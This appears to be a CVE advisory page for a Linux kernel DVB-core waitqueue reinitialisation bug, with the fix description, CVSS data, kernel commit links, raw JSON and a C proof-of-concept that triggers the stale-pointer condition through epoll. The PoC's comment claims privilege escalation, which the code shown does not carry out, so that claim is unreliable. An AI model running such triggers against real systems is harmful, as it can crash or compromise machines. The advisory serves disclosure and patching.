Security Vulnerability Report
CVE-2026-23253 CVSS 7.8 HIGH

CVE-2026-23253

Published: 2026-03-18 18:16:23
Last Modified: 2026-04-18 09:16:15
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

media: dvb-core: fix wrong reinitialization of ringbuffer on reopen

dvb_dvr_open() calls dvb_ringbuffer_init() when a new reader opens the DVR device. dvb_ringbuffer_init() calls init_waitqueue_head(), which reinitializes the waitqueue list head to empty.

Since dmxdev->dvr_buffer.queue is a shared waitqueue (all opens of the same DVR device share it), this orphans any existing waitqueue entries from io_uring poll or epoll, leaving them with stale prev/next pointers while the list head is reset to {self, self}.

The waitqueue and spinlock in dvr_buffer are already properly initialized once in dvb_dmxdev_init(). The open path only needs to reset the buffer data pointer, size, and read/write positions.

Replace the dvb_ringbuffer_init() call in dvb_dvr_open() with direct assignment of data/size and a call to dvb_ringbuffer_reset(), which properly resets pread, pwrite, and error with correct memory ordering without touching the waitqueue or spinlock.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel < 5.15.x (unfixed versions)
Linux Kernel < 6.1.x (unfixed versions)
Linux Kernel < 6.6.x (unfixed versions)
Linux Kernel < 6.12.x (unfixed versions)
For the exact affected versions, refer to the fix commits published on git.kernel.org: 32eb8e4adc207ef31bc6e5ae56bab940b0176066, 527cfa8a3486b3555c5c15e2f62be484a11398dc, and others.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/epoll.h>
#include <errno.h>

/*
 * PoC for CVE-2026-23253: Linux kernel DVB-core ringbuffer reinitialization race condition
 * This PoC demonstrates the race condition when reopening DVR device while io_uring/epoll
 * has waitqueue entries, causing orphaned waitqueue entries with stale pointers.
 *
 * Compile: gcc -o cve_2026_23253_poc cve_2026_23253_poc.c
 * Run as low-privilege user to trigger privilege escalation
 */

#define DVR_DEVICE "/dev/dvb/adapter0/dvr0"

int main(int argc, char *argv[])
{
    int fd1, fd2, epfd;
    struct epoll_event ev;

    printf("CVE-2026-23253 PoC - DVB-core ringbuffer race condition\n");
    printf("Target: %s\n\n", DVR_DEVICE);

    // Open first DVR device file descriptor
    fd1 = open(DVR_DEVICE, O_RDWR);
    if (fd1 < 0) {
        fprintf(stderr, "[-] Failed to open DVR device (fd1): %s\n", strerror(errno));
        printf("[!] Note: DVR device may not exist or requires root privileges\n");
        return 1;
    }
    printf("[+] Opened DVR device (fd1): %d\n", fd1);

    // Set up epoll to monitor fd1
    epfd = epoll_create1(0);
    if (epfd < 0) {
        perror("[-] epoll_create1 failed");
        close(fd1);
        return 1;
    }
    ev.events = EPOLLIN | EPOLLOUT;
    ev.data.fd = fd1;
    if (epoll_ctl(epfd, EPOLL_CTL_ADD, fd1, &ev) < 0) {
        perror("[-] epoll_ctl failed");
        close(fd1);
        close(epfd);
        return 1;
    }
    printf("[+] Added fd1 to epoll instance\n");

    // Open second DVR device file descriptor (triggers dvb_dvr_open -> dvb_ringbuffer_init)
    // This reinitializes the shared waitqueue, orphaning epoll entries
    fd2 = open(DVR_DEVICE, O_RDWR);
    if (fd2 < 0) {
        fprintf(stderr, "[-] Failed to open DVR device (fd2): %s\n", strerror(errno));
        close(fd1);
        close(epfd);
        return 1;
    }
    printf("[+] Opened DVR device (fd2): %d\n", fd2);
    printf("[!] Race condition triggered: waitqueue reinitialized, epoll entries orphaned\n");

    // Trigger epoll_wait to access orphaned waitqueue entries
    struct epoll_event events[10];
    int nfds = epoll_wait(epfd, events, 10, 100);
    printf("[*] epoll_wait returned: %d (may show undefined behavior)\n", nfds);

    // Cleanup
    close(fd2);
    close(fd1);
    close(epfd);

    printf("[+] PoC completed. Check kernel logs for any errors or crashes.\n");
    return 0;
}

References

https://git.kernel.org/stable/c/32eb8e4adc207ef31bc6e5ae56bab940b0176066
https://git.kernel.org/stable/c/527cfa8a3486b3555c5c15e2f62be484a11398dc
https://git.kernel.org/stable/c/af050ab44fa1b1897a940d7d756e512232f5e5df
https://git.kernel.org/stable/c/bfbc0b5b32a8f28ce284add619bf226716a59bc0
https://git.kernel.org/stable/c/cfd94642025e6f71c8f754bdec0800ee95e4f3dd
https://git.kernel.org/stable/c/d71781bad59b1c9d60d7068004581f9bf19c0c9d
https://git.kernel.org/stable/c/f1e520ca2e83ece6731af6167c9e5e16931ecba0
https://git.kernel.org/stable/c/fb378cf89be434ed1f10ab79cc4788fba8ae868d

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-23253",
    "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "published": "2026-03-18T18:16:23.383",
    "lastModified": "2026-04-18T09:16:15.050",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-core: fix wrong reinitialization of ringbuffer on reopen\n\ndvb_dvr_open() calls dvb_ringbuffer_init() when a new reader opens the\nDVR device. dvb_ringbuffer_init() calls init_waitqueue_head(), which\nreinitializes the waitqueue list head to empty.\n\nSince dmxdev->dvr_buffer.queue is a shared waitqueue (all opens of the\nsame DVR device share it), this orphans any existing waitqueue entries\nfrom io_uring poll or epoll, leaving them with stale prev/next pointers\nwhile the list head is reset to {self, self}.\n\nThe waitqueue and spinlock in dvr_buffer are already properly\ninitialized once in dvb_dmxdev_init(). The open path only needs to\nreset the buffer data pointer, size, and read/write positions.\n\nReplace the dvb_ringbuffer_init() call in dvb_dvr_open() with direct\nassignment of data/size and a call to dvb_ringbuffer_reset(), which\nproperly resets pread, pwrite, and error with correct memory ordering\nwithout touching the waitqueue or spinlock."
      },
      {
        "lang": "es",
        "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nmedia: dvb-core: corrige la reinicialización incorrecta del búfer circular al reabrir\n\ndvb_dvr_open() llama a dvb_ringbuffer_init() cuando un nuevo lector abre el dispositivo DVR. dvb_ringbuffer_init() llama a init_waitqueue_head(), lo que reinicializa la cabecera de la lista de la cola de espera a vacía.\n\nDado que dmxdev->dvr_buffer.queue es una cola de espera compartida (todas las aperturas del mismo dispositivo DVR la comparten), esto deja huérfanas las entradas existentes de la cola de espera de io_uring poll o epoll, dejándolas con punteros prev/next obsoletos mientras la cabecera de la lista se restablece a {self, self}.\n\nLa cola de espera y el spinlock en dvr_buffer ya están correctamente inicializados una vez en dvb_dmxdev_init(). La ruta de apertura solo necesita restablecer el puntero de datos del búfer, el tamaño y las posiciones de lectura/escritura.\n\nReemplace la llamada a dvb_ringbuffer_init() en dvb_dvr_open() con la asignación directa de datos/tamaño y una llamada a dvb_ringbuffer_reset(), que restablece correctamente pread, pwrite y error con el ordenamiento de memoria correcto sin tocar la cola de espera o el spinlock."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "references": [
      {"url": "https://git.kernel.org/stable/c/32eb8e4adc207ef31bc6e5ae56bab940b0176066", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"},
      {"url": "https://git.kernel.org/stable/c/527cfa8a3486b3555c5c15e2f62be484a11398dc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"},
      {"url": "https://git.kernel.org/stable/c/af050ab44fa1b1897a940d7d756e512232f5e5df", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"},
      {"url": "https://git.kernel.org/stable/c/bfbc0b5b32a8f28ce284add619bf226716a59bc0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"},
      {"url": "https://git.kernel.org/stable/c/cfd94642025e6f71c8f754bdec0800ee95e4f3dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"},
      {"url": "https://git.kernel.org/stable/c/d71781bad59b1c9d60d7068004581f9bf19c0c9d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"},
      {"url": "https://git.kernel.org/stable/c/f1e520ca2e83ece6731af6167c9e5e16931ecba0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"},
      {"url": "https://git.kernel.org/stable/c/fb378cf89be434ed1f10ab79cc4788fba8ae868d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}
    ]
  }
}